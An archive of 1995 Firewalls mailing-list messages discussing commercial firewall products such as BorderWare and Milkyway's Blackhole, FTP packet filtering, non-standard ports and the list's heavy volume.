Dec 94 Interactive Age - May 8, 95 .. and if you are interested in a comparison of token based solns.. Data Communications - May 95 Rajani INTERNET: rajani@fujitsu.ca From firewalls-owner Mon May 15 08:22:37 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA07099 for firewalls-outgoing; Mon, 15 May 1995 07:29:59 -0700 Received: from interwork.com (daffy.interwork.com [198.73.138.240]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA07094 for ; Mon, 15 May 1995 07:29:56 -0700 Received: from surf.interwork.com by interwork.com with SMTP (5.65/1.2-eef) id AA19905; Mon, 15 May 95 10:25:18 -0400 Message-Id: Read-Receipt-To: James LaPalme Priority: Normal To: firewalls@greatcircle.com Mime-Version: 1.0 From: James LaPalme Subject: Milkyway's Black Hole product Date: Sun, 14 May 95 14:33:35 EDT Content-Type: text/plain; charset=US-ASCII; X-MAPIextension=".TXT" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am searching for information on Milkyway Network's Black Hole product. Information is welcome from end users, the manufacturer or channel partners (if any). The main question would be "Why Blackhole?". * James E. LaPalme Interwork Software 501-150 Laurier Ave. West Ottawa, Ontario Canada K1P 5J4 Tel: (613) 238-8835 Fax: (613) 238-4453 800: (800) 461-8649 E-Mail: JamesL@Interwork.com * From firewalls-owner Mon May 15 08:44:03 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA07046 for firewalls-outgoing; Mon, 15 May 1995 07:28:03 -0700 Received: from Disclosure.COM (di.disclosure.com [199.97.230.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA07041 for ; Mon, 15 May 1995 07:27:56 -0700 Received: by Disclosure.COM (4.1/SMI-4.1) id AA23129; Mon, 15 May 95 10:29:54 EDT Date: Mon, 15 May 1995 10:29:53 -0400 (EDT) From: Scott Barman To: Stephen.L.Arnold@Arnold.Com Cc: Firewalls@GreatCircle.Com Subject: Re: BorderWare (previously "JANUS") In-Reply-To: <01HQIFMFTRV28WW4XX@Badger.Arnold.Com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sun, 14 May 1995 Stephen.L.Arnold@Arnold.Com wrote: [Post about BorderWare deleted. I am not a sales droid for them, just someone who is reviewing different products for a client and BorderWare is one of them--in fact, it's on my "A" list] > Borderware seems to be a BSD O.S.-based combination packet filter/ > circuit relay/application relay. The O.S. has been stripped to a > minimum set of files. (I didn't pursue how they defined "minimum".) It's a stripped down version of BSD/OS from BSDI. I was told by their sales droid that it is stripped down as far as they need it to be and that nothing "extraneous" is left. > It is shipped closed, and it's claimed to have a relatively simple ("as > a light switch"!) management interface to turn the supplied, frequently > required services (FTP, mail, web, outbound finger, etc.). There is > said to be no customization beyond that. (Use S.E.A.L.!) BorderWare, according to my information, can support all internet-based services using a "simple" menu system. The system does not run X for some very obvious reasons. The last time I saw it (the company was called Janus) it seemed to be a very robust system that worked nicely as a firewall. Then again, I am not sure I would run any services on the firewall anyway, so I can't comment on its alleged "limited" functionality. > It comes as software or with a correctly configured Pentium-based PC. > If I remember correctly (and there's little chance of that!), pricing is > $4000 for some number of internal users (100?), $7000 for more (500?), > and $11,000 for unlimited users. The prices quoted to me are: $11,000 for an unlimited license $ 7,000 to support 26-100 workstations on your LAN $ 4,000 for support up to 25 workstations. As a firewall, it looks a bit like the others. Some like the prices (it does seem "cheap" compared to others). The only problem is that some of my customers are not happy that it's a BSD-based system (and I am not sure I understand this mentality). If you're checking out BorderWare, I do suggest you check out the following (as comparisons): Gauntlet from Trusted Information Systems, http://www.tis.com Sidewinder from Secure Computing Corp., http://www.sctc.com Good luck. scott barman scott@disclosure.com STD DISCLAIMER: I speak for nobody but myself... and sometimes I can't even do that!! From firewalls-owner Mon May 15 09:04:05 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA08123 for firewalls-outgoing; Mon, 15 May 1995 08:09:21 -0700 Received: from box.eunet.be (box.eunet.be [192.92.130.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA08118 for ; Mon, 15 May 1995 08:09:17 -0700 Received: (from drachen@localhost) by box.eunet.be (8.6.9/8.6.9) id RAA11984; Mon, 15 May 1995 17:08:01 +0200 Date: Mon, 15 May 1995 17:07:59 +0200 (MET DST) From: Didier Racheneur X-Sender: drachen@box To: firewalls@greatcircle.com Subject: Volume !!! Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi ! There is so much volume on this list ! Almost 100K every day (and I only speak about firewalls-digest). Ii is almost impossible to do one's job and to read the list. Or is it only for the jobless ? Does anyone have a solution or an idea ? Didier From firewalls-owner Mon May 15 09:36:56 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA07886 for firewalls-outgoing; Mon, 15 May 1995 07:59:09 -0700 Received: from ingress.com (ingress.com [199.171.57.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA07879 for ; Mon, 15 May 1995 07:59:05 -0700 Received: by ingress.com (4.1/SMI-4.1) id AA21454; Mon, 15 May 95 10:56:51 EDT Date: Mon, 15 May 95 10:56:51 EDT From: cbk@ingress.com (Charles Kaplan) Message-Id: <9505151456.AA21454@ingress.com> To: firewalls@greatcircle.com Subject: Re: BorderWare (previously "JANUS") Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Subject: Re: BorderWare (previously "JANUS") [Originally sent to firewalls-owner@GreatCircle.Com by mistake on 10-May. Sorry...] > mention of a product previously known as "JANUS" but now called "BorderWare > FireWall Server." Does anyone have experience or input they care to share on > this product? > Thanks in advance! > > -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- > "Printmaker gone digital" billcurr@cyberspace.com > http://www.cyberspace.com/billcurr > -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =====NOT A FLAME, but a few corrections. I have no experience with the product, but I'm here in Washington, DC, at the DECUS (Digital Equipment Computer Users Society) National Event, where BorderWare is exhibiting in the trade show. (If I understand correctly, Digital is now reselling Borderware as its low-priced entry firewall. S.E.A.L. continues as the advanced offering.) Borderware seems to be a BSD O.S.-based combination packet filter/ circuit relay/application relay. The O.S. has been stripped to a minimum set of files. (I didn't pursue how they defined "minimum".) It is shipped closed, and it's claimed to have a relatively simple ("as a light switch"!) management interface to turn the supplied, frequently required services (FTP, mail, web, outbound finger, etc.). There is said to be no customization beyond that. (Use S.E.A.L.!) >>Correct. The Firewall Server is a Black Box, designed to be completely >> self maintaining. It combines both a firewall with your most common >> application servers (WWW, Anon FTP, DNS, finger, POP, News spool). It comes as software or with a correctly configured Pentium-based PC. If I remember correctly (and there's little chance of that!), pricing is $4000 for some number of internal users (100?), $7000 for more (500?), and $11,000 for unlimited users. >>A bit off the mark here. It comes as software, or pre-installed onto an >> appropratly configured PC (grin), within the limits of the SI's knowledge, >> as pulled from the site staff. >> List prices are $4000 for upto 25 screens >> $7000 for upto 100 screens >> $11000 for unlimited screens >> expect a high end pc, with lots of news disk to be on the order of $5000, >> and the a few dollers to ensure it all works. >> TO CLARIFY NOW, a screen is a monitor. If your net has X-terms, or dumb >> terminals, if they can get telnet, they are a screen. (ABOUT) Security tokens are extra. They resell CRYPTOCard challenge-response tokens (like me) and Security Dynamics time-synchronization tokens. For SecurID, the ACE server runs on the box in the first release. In a later release you can use an existing ACE server on your internal net, thus having a single security database. >> Crypto Card runs as you say on the box, SecurID still isn't released. >> It has been announced as under devlopment, and I ammong others look >> forward to seeing it later this summer. Please verify the information above, as I've not checked it! Browse http://www.border.com/ for more information. I hope this will be of some initial help. >>Now verified >>Hope this helps out anyone interested in the product. Demo's are available, >>allong with many knowledgable resellers. --- Charles B. Kaplan Vice President Ingress Communications, Inc. Enterprise Networking Ste 3406 Empire St Bld NY, NY 10118 cbk@ingress.com 45 Grant Avenue, Norwood, MA 02062 Networking / Internetworking / Security / Object Technology NT / UNIX / Novell From firewalls-owner Mon May 15 10:03:32 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA09163 for firewalls-outgoing; Mon, 15 May 1995 08:35:20 -0700 Received: from clark.net (clark.net [168.143.0.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA09158 for ; Mon, 15 May 1995 08:35:17 -0700 Received: (hcb@localhost) by clark.net (8.6.12/8.6.5) id LAA07555 for firewalls@greatcircle.com; Mon, 15 May 1995 11:35:02 -0400 From: Howard Berkowitz Message-Id: <199505151535.LAA07555@clark.net> Subject: FW-SNMP List Problem? To: firewalls@greatcircle.com Date: Mon, 15 May 1995 11:35:00 -0400 (EDT) X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Content-Length: 193 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I've sent four contributions to the FW-SNMP list, but have not received anything back or any other postings. I did receive my majordomo subscription confirmation. Is anything wrong? Howard From firewalls-owner Mon May 15 10:14:10 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA08940 for firewalls-outgoing; Mon, 15 May 1995 08:28:52 -0700 Received: from godzilla.PCC.COM ([204.249.8.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA08928 for ; Mon, 15 May 1995 08:28:47 -0700 Received: by godzilla.PCC.COM (Smail3.1.29.1 #3) id m0sB23s-0000JkC; Mon, 15 May 95 11:28 EDT Message-Id: From: jay@pcc.com (Jay Schuster) Subject: Packet Filtering, and FTP Customizations To: firewalls@GreatCircle.COM Date: Mon, 15 May 95 11:28:00 EDT X-Mailer: ELM [version 2.3 PL11] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm trying to use packet filtering on our Cisco 2501 router to implement some security. I'd like to allow FTP clients to access the outside world, but will run into the incoming connection problem described in the FAQ and the C&B Firewalls book. Both the FAQ and the C&B Firewalls book mention customizing the FTP client to use either a restricted port range or to use the PASV command to reverse the origination site of the data connection. Has anyone done this? Is there source code or patches available to do this anywhere? Thanks in advance, Jay -- Jay Schuster The People's Computer Company `Revolutionary Programming' From firewalls-owner Mon May 15 10:25:08 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA09184 for firewalls-outgoing; Mon, 15 May 1995 08:36:18 -0700 Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA09179 for ; Mon, 15 May 1995 08:36:14 -0700 Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU via SMTP; Mon, 15 May 1995 11:35:48 -0400 Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-5.67b/res.client.cf-3.7) id AA23789; Mon, 15 May 1995 11:35:46 -0400 Date: Mon, 15 May 1995 11:35:46 -0400 From: long-morrow@CS.YALE.EDU (H Morrow Long) Message-Id: <199505151535.AA23789@SPARKY.CF.CS.YALE.EDU> To: firewalls@greatcircle.com, steveg@cseic.saic.com Subject: Re: Firewall Web Page Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Could someone please send me the *current* URL for the "Firewall Products" >Web page maintained by a kind reader of this list? I believe the following is the latest URL (the document states that it was last updated 5-3-95): http://www.access.digex.net/~bdboyle/firewall.vendor.html The Firewalls Vendor FAQ is by Catherine Fulmer (mailto:cfulmer@pnc-pimc.com) is is made available on the Web by Brian Boyle. This is the disclaimer at the end of the document: DISCLAIMER: THIS INFORMATION COMES FROM SOURCES THAT CANNOT BE VERIFIED. AS SUCH, MAKE NO ASSUMPTIONS ABOUT ITS COMPLETENESS OR ACCURACY. I ENDEAVOR TO KEEP THIS LIST UP TO DATE AS MUCH AS POSSIBLE. FEEL FREE TO SEND COMMENTS/ UPDATES TO [114]CATHERINE FULMER. DATE LAST UPDATE: 05-03-95. --------------------------------------------------- From firewalls-owner Mon May 15 10:43:36 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA08585 for firewalls-outgoing; Mon, 15 May 1995 08:22:24 -0700 Received: from artemis.sto.fdata.se (artemis.sto.fdata.se [159.72.7.54]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA08560 for ; Mon, 15 May 1995 08:21:57 -0700 Received: (from tekantj@localhost) by artemis.sto.fdata.se (8.6.9/8.6.9) id PAA29282; Mon, 15 May 1995 15:19:27 GMT From: "Anders Tjader" Message-Id: <9505151719.ZM29278@artemis.sto.fdata.se> Date: Mon, 15 May 1995 17:19:23 +0200 In-Reply-To: steveg@cseic.saic.com (Stephen Harold Goldstein) "Firewall Web Page" (May 15, 14:04) References: <9505151429.AA22128@cseic.saic.com> Reply-To: anders.tjader@sto.fdata.se X-Mailer: Z-Mail (3.2.0 06sep94) To: steveg@cseic.saic.com (Stephen Harold Goldstein) Subject: Re: Firewall Web Page Cc: firewalls@GreatCircle.COM Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="PART-BOUNDARY=.19505151719.ZM29278.sto.fdata.se" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk --PART-BOUNDARY=.19505151719.ZM29278.sto.fdata.se Content-Description: Text Content-Type: text/plain ; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Zm-Decoding-Hint: mimencode -q -u On May 15, 14:04, Stephen Harold Goldstein wrote: > Subject: Firewall Web Page > Could someone please send me the *current* URL for the "Firewall Produc= ts" > Web page maintained by a kind reader of this list? > > Stephen Goldstein steveg@cseic.saic.com > My first computer: A 24K Atari 800, Rev. A ROMS, November 1980 > Disclaimer: That's not what I said. >-- End of excerpt from Stephen Harold Goldstein http://www.access.digex.net/~bdboyle/firewall.vendor.html -- = ________________________________________________________________________ Anders Tj=E4der \_o_/ Voice: +46-8-7888791 WM-Data F=F6rsvarsdata AB | Fax: +46-8-6643380 S-10787 STOCKHOLM / \ Minicall: +46-746-447632 Internet: anders.tjader@sto.fdata.se X400: C=3Dse; A=3D{sil,400net}; P=3Dwmdata; O=3Dsto; S=3Dtjader; G=3Da= nders MEMONET: WMDATA.SEWMSTO.ATJADER URL: http://w3.wmdata.se/webmaster.html _____________________100% Buzzword Compliant____________________________ --PART-BOUNDARY=.19505151719.ZM29278.sto.fdata.se-- From firewalls-owner Mon May 15 10:55:10 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA10886 for firewalls-outgoing; Mon, 15 May 1995 09:48:00 -0700 Received: from s.ecc.engr.uky.edu (s.ecc.engr.uky.edu [128.163.144.19]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA10881 for ; Mon, 15 May 1995 09:47:57 -0700 Received: (from morgan@localhost) by s.ecc.engr.uky.edu (8.6.10/8.6.10) id MAA07914 for firewalls@greatcircle.com; Mon, 15 May 1995 12:49:20 -0400 Date: Mon, 15 May 1995 12:49:20 -0400 From: Wes Morgan Message-Id: <199505151649.MAA07914@s.ecc.engr.uky.edu> To: firewalls@greatcircle.com Subject: Token-based security article Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Data Communications, May 1995 Products reviewed: Multiguard - Communication Devices Inc SLC - Cryptocard Inc Defender 5000 - Digital Pathways Inc Traqnet 2008 - Leemah Datacom Security Corp MCR 4000 - Microframe Inc DL 1000 - Optimum Electronics Inc Access Gateway - Racal Guardata ACM/400 - Security Dynamics These products encompassed everything from Watchword calculators and SecureID to in-line hardware devices and floppy tokens. An interesting article... --Wes ps> For those interested in back issues/subscriptions to Data Communications: 1-800-525-5003 or datacomm@mcgraw-hill.com From firewalls-owner Mon May 15 11:04:41 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA10327 for firewalls-outgoing; Mon, 15 May 1995 09:19:54 -0700 Received: from jupiter.man.net (jupiter.man.net [198.53.163.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA10317 for ; Mon, 15 May 1995 09:19:51 -0700 Received: by jupiter.man.net (8.6.10/1.37) id LAA22602; Mon, 15 May 1995 11:22:19 -0500 Message-Id: <199505151622.LAA22602@man.net> Subject: Blackhole product To: jamesl@interwork.com Date: Mon, 15 May 1995 11:22:18 -0500 (cdt) From: "Lionel Boiteau" Cc: firewalls@greatcircle.com X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1046 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The Blackhole firewall from Milkyway Networks has full user level authenication which in cludes mosaic, gopher, FTP, telent. It is currently the only firewall under evaluation with Communication Security Establishment (ie. Federal Government endorsed). It has the capability for a Virtual Private Network which allows secure data transfer between company networks. It has more features than other products, ie. monitors all ports, transparent proprietary application support, imbedded IP address application support, etc. Info available from http://www.milkyway.com Milkyway is based in Ottawa, Canada. Blackhole is a Canadian product. AStra Network in Winnipeg is the authorized reseller of Blackhole in Manitoba. -- ______________________________________________________________ * Lionel Boiteau * * Astra Network, Inc. * * Manitoba's First Commercial Internet Service provider * * (204) 987-7050 http://www.man.net/ * From firewalls-owner Mon May 15 11:26:00 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA10710 for firewalls-outgoing; Mon, 15 May 1995 09:41:05 -0700 Received: from tera.bctel.net (tera.bctel.net [204.174.66.253]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA10700 for ; Mon, 15 May 1995 09:41:00 -0700 Received: (from nobody@localhost) by tera.bctel.net (8.6.10/8.6.10) id JAA15193 for ; Mon, 15 May 1995 09:38:15 -0700 Received: from ilinx(192.197.176.225) by tera via smap (V1.3) id sma015191; Mon May 15 09:38:03 1995 Received: by ilinx.ilinx.com (/\==/\ Smail3.1.28.1 #28.1) id ; Mon, 15 May 95 09:40 PDT Message-Id: From: brian@ilinx.ilinx.com (Brian J. Murrell) To: jamesl@interwork.com Subject: Re: Milkyway's Black Hole product Cc: firewalls@greatcircle.com Date: Mon, 15 May 1995 09:40:17 -0700 (PDT) MIME-Version: 1.0 X-Mailer: Ishmail 1.0.5-386-950210 Available via anonymous ftp from ftp.halsoft.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk from the quill of James LaPalme on scroll > I am searching for information on Milkyway Network's Black Hole product. > > Information is welcome from end users, the manufacturer or channel > partners > (if any). The main question would be "Why Blackhole?". > Seriously, no sarcasm intended... As opposed to what?? Nothing, another product?? I think to get a realistic answer to "why Blackhole", you have to qualify what you want to compare it to. b. -- Brian J. Murrell brian@ilinx.com InterLinx Support Services, Inc. brian@wimsey.com North Vancouver, B.C. 604 983 UNIX Platform and Brand Independent UNIX Support - R3.2 - R4 - BSD From firewalls-owner Mon May 15 11:44:42 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA10676 for firewalls-outgoing; Mon, 15 May 1995 09:40:30 -0700 Received: from oznet02.ozemail.com.au (oznet02.ozemail.com.au [203.2.192.124]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA10664 for ; Mon, 15 May 1995 09:39:49 -0700 Received: from shell01.ozemail.com.au (sstevens@shell01.ozemail.com.au [203.2.192.121]) by oznet02.ozemail.com.au (8.6.10/8.6.5) with ESMTP id CAA14572; Tue, 16 May 1995 02:39:29 +1000 Received: (sstevens@localhost) by shell01.ozemail.com.au (8.6.10/8.6.5) id CAA10180; Tue, 16 May 1995 02:39:28 +1000 From: Skeeve Stevens Message-Id: <199505151639.CAA10180@shell01.ozemail.com.au> Subject: Re: Volume !!! To: drachen@eunet.be (Didier Racheneur) Date: Tue, 16 May 1995 02:39:28 +1000 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Didier Racheneur" at May 15, 95 05:07:59 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 800 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > There is so much volume on this list ! Almost 100K every day > (and I only speak about firewalls-digest). Ii is almost impossible > to do one's job and to read the list. Or is it only for the jobless ? > Does anyone have a solution or an idea ? > Didier It easy.. if the Subject line doesnt interest me, it gets deleted... and after a while you know authors, so ill look out for the guys with something to say. ------------------------------------------------------------------ Skeeve Stevens Internet Consultant, WWW Developer & Freelance Internet Journalist Email: skeeve@ozemail.com.au Phone: (+612) 386-1424 skeeve@zip.com.au skeeve@suburbia.apana.org.au Home Page: http://www.ozemail.com.au/~sstevens http://www.zip.com.au/~skeeve #include From firewalls-owner Mon May 15 11:47:46 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA11211 for firewalls-outgoing; Mon, 15 May 1995 10:00:55 -0700 Received: from mailer.fsu.edu (mailer.fsu.edu [128.186.6.103]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA11206 for ; Mon, 15 May 1995 10:00:50 -0700 Received: from pasco.UUCP by mailer.fsu.edu with UUCP id AA02936 (5.65c/IDA-1.4.4 for greatcircle.com!Firewalls); Mon, 15 May 1995 13:00:33 -0400 Date: Mon, 15 May 1995 12:48:47 -400 (EDT) From: Firewalls List subscriber account Reply-To: Firewalls List subscriber account Subject: Not very well-known ports To: Firewalls@greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk As I was browsing thru The Firewall Book over the weekend, I noticed that the authors stated, in at least two places, that they were using unusual port numbers to move data thru their firewall. Now I'm wondering, is this something to be recommended to those of us who are fairly new to fire-walling, and what are the advantages and disadvantages of it? What I can see in favor of this: First, not pushing mail through on port 25 might alleviate some probes from novices (like myself) such as 'telnet hostname 25' followed by the usual sendmail tactics; and using, say, port 402, for a bunch of other services--like telnet, gopher, etc--could simplify filter rules and access lists. Finally, this technique would mean that the user inside the firewall would have to know the corporate policy (i.e. you can only get out on port 402, etc.) Is this assessment correct? Are there other benefits of this approach that I am missing? --------------------------------------------------------------------------- Richard Fritz, Systems Analyst 813.929.2344(v) 2114(f) District School Board of Pasco County rfritz@pasco.k12.fl.us --------------------------------------------------------------------------- From firewalls-owner Mon May 15 11:50:54 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA12751 for firewalls-outgoing; Mon, 15 May 1995 10:57:36 -0700 Received: from interwork.com (daffy.interwork.com [198.73.138.240]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA12746 for ; Mon, 15 May 1995 10:57:32 -0700 Received: from surf.interwork.com by interwork.com with SMTP (5.65/1.2-eef) id AA00533; Mon, 15 May 95 13:52:42 -0400 Message-Id: Priority: Normal To: Firewalls Discussion List Mime-Version: 1.0 From: James LaPalme Subject: Milkyway Con't Date: Mon, 15 May 95 14:01:13 EDT Content-Type: text/plain; charset=US-ASCII; X-MAPIextension=".TXT" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My attempt at a brief message (to save everyone's time and energy) has lead to some minor confusion. The question - "Why Blackhole?" - should have been expanded to read "Why pick (or not) Blackhole?" i.e. feature & benefits, personel experience, hands on comparitive analysis, any technical advantage, etc.? Document form (for hard copy future reference) - electronic or otherwise is preferred. * James E. LaPalme Interwork Software 501-150 Laurier Ave. West Ottawa, Ontario Canada K1P 5J4 Tel: (613) 238-8835 Fax: (613) 238-4453 800: (800) 461-8649 E-Mail: JamesL@Interwork.com * From firewalls-owner Mon May 15 12:28:55 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA12337 for firewalls-outgoing; Mon, 15 May 1995 10:47:38 -0700 Received: from maddie.atlantic.com (maddie.atlantic.com [198.252.200.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA12331 for ; Mon, 15 May 1995 10:47:32 -0700 Received: (pokey@localhost) by maddie.atlantic.com (8.6.10/8.6.9) id NAA04456; Mon, 15 May 1995 13:30:58 -0400 From: Rick Romkey Message-Id: <199505151730.NAA04456@maddie.atlantic.com> Subject: Re: BorderWare (previously "JANUS") To: scott@Disclosure.COM (Scott Barman) Date: Mon, 15 May 1995 13:30:57 -0400 (EDT) Cc: Stephen.L.Arnold@Arnold.Com, Firewalls@GreatCircle.COM In-Reply-To: from "Scott Barman" at May 15, 95 10:29:53 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 4071 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > On Sun, 14 May 1995 Stephen.L.Arnold@Arnold.Com wrote: > > [Post about BorderWare deleted. I am not a sales droid for them, just > someone who is reviewing different products for a client and BorderWare > is one of them--in fact, it's on my "A" list] > > > Borderware seems to be a BSD O.S.-based combination packet filter/ > > circuit relay/application relay. The O.S. has been stripped to a > > minimum set of files. (I didn't pursue how they defined "minimum".) > > It's a stripped down version of BSD/OS from BSDI. I was told by their > sales droid that it is stripped down as far as they need it to be and > that nothing "extraneous" is left. Well it's more than just a stripped down version of BSDi. It truly has been "hardened". The BorderWare firewall shouldn't even be thought of as a UNIX box, since it is extremely black-box. The OS will not run non-BorderWare code, assuming someone somehow managed to upload it there in the first place. There are no logins on the box. > > > It is shipped closed, and it's claimed to have a relatively simple ("as > > a light switch"!) management interface to turn the supplied, frequently > > required services (FTP, mail, web, outbound finger, etc.). There is > > said to be no customization beyond that. (Use S.E.A.L.!) > > BorderWare, according to my information, can support all internet-based > services using a "simple" menu system. The system does not run X for > some very obvious reasons. The last time I saw it (the company was > called Janus) it seemed to be a very robust system that worked nicely as > a firewall. Then again, I am not sure I would run any services on the > firewall anyway, so I can't comment on its alleged "limited" > functionality. Well saying that it supports "all" Internet based services is stretching it a bit. It does, however, allow the administrator to setup both common and custom proxies. It does has some limited functionality as far as its Web server goes. It runs the original CERN httpd (one again, hardened) which has no support for CGI BIN (for obvious security reasons). We typically recommend any customer with this need to place a server on their public network and either disable the BorderWare WWW server or only use it for a limited sub-set of documents. As far as other servers go, they seem to work quite nicely...the FTP is simple enough and the USENET news and Mail seem to work wonderfully. > > It comes as software or with a correctly configured Pentium-based PC. > > If I remember correctly (and there's little chance of that!), pricing is > > $4000 for some number of internal users (100?), $7000 for more (500?), > > and $11,000 for unlimited users. > > The prices quoted to me are: > $11,000 for an unlimited license > $ 7,000 to support 26-100 workstations on your LAN > $ 4,000 for support up to 25 workstations. > > As a firewall, it looks a bit like the others. Some like the prices (it > does seem "cheap" compared to others). The only problem is that some of > my customers are not happy that it's a BSD-based system (and I am not > sure I understand this mentality). These prices are the correct list prices. We have typically recommended loaded Pentium hardware (32 MB Ram, 2 GB disk, DAT, etc) for anyone who is considering running news. We recommend that customers have us at least burn-test everything first, although if you are comfortable with networking, fiddling with IRQ settings and the like, you can probably install and integrate it on your own. If anyone needs some help with discussing BorderWare or info on local resellers, call Border at (416) 368 7157 or send me e-mail and I'll try and hook you up with someone local. -Rick ---------------------------------------------------------------------------- Rick E Romkey | A T L A N T I C | Internet pokey@atlantic.com | Computing Technology Corporation | Specialists (203) 257-7163 | http://www.atlantic.com/ | ----------------------------------------------------------------------------- From firewalls-owner Mon May 15 12:27:55 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA12262 for firewalls-outgoing; Mon, 15 May 1995 10:45:02 -0700 Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA12248 for ; Mon, 15 May 1995 10:44:57 -0700 Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU via SMTP; Mon, 15 May 1995 13:44:42 -0400 Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-5.67b/res.client.cf-3.7) id AA24150; Mon, 15 May 1995 13:44:41 -0400 Date: Mon, 15 May 1995 13:44:41 -0400 From: long-morrow@CS.YALE.EDU (H Morrow Long) Message-Id: <199505151744.AA24150@SPARKY.CF.CS.YALE.EDU> To: drachen@eunet.be Subject: Re: Volume !!! Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: Didier Racheneur > ... >There is so much volume on this list ! Almost 100K every day >(and I only speak about firewalls-digest). Ii is almost impossible >to do one's job and to read the list. Or is it only for the jobless ? >Does anyone have a solution or an idea ? 1. Hire someone to screen the list for you and summarize/paraphrase those items you are interested in an present them to you in a daily digest. This is the paid editor/consultant/assistant model. 2. Create an artifically intelligent mail screener program to do same. Many people are currently trying to do this with their e-mail and mailing lists flows - with differing degrees of sucess and fallibility. 3. Don't read the messages. Scan them visually superficially and just route them to a file (or delete them and rely on the Web archive site). Later 'grep' (search) through them when you need to find that message that you are sure was posted to Firewalls three months ago.... - Morrow From firewalls-owner Mon May 15 12:30:33 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA16106 for firewalls-outgoing; Mon, 15 May 1995 12:04:16 -0700 Received: from real.com (eagle.real.com [199.97.122.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA16101 for ; Mon, 15 May 1995 12:04:10 -0700 Date: Mon, 15 May 1995 15:03:01 -0400 From: bret@real.com (Bret McDanel) Received: by real.com (8.6.8.1/3.2.012693-Realistic Technologies 